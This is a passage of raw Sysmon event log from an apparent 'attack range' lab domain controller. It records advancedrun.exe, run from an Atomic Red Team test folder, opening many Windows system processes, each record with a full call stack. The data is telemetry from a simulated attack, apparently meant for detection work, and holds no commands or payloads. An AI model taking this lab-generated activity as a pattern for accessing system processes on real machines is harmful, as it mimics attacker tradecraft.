4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983816Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.334{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-2F00-000000002702}2440C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983815Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.334{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB6F-61EA-B100-000000002702}2348C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003983814Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.334{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF4-61EA-2D00-000000002702}2988C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983813Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.334{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB13-61EA-9A00-000000002702}5612C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983812Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.334{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF2-61EA-2C00-000000002702}2896C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983811Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.334{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF2-61EA-2B00-000000002702}2888C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983810Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.334{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB12-61EA-9900-000000002702}5508C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983809Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.334{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF0-61EA-2900-000000002702}2760C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983808Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.334{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB12-61EA-9700-000000002702}5364C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983807Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.334{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE8-61EA-2000-000000002702}1516C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003983806Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.334{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1800-000000002702}1384C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003983805Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.334{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB11-61EA-9500-000000002702}428C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983804Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.334{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1700-000000002702}1300C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983803Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.334{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-9000-000000002702}3336C:\Windows\System32\taskhostw.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983802Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.334{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1600-000000002702}1264C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003983801Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.334{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1500-000000002702}1064C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003983800Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 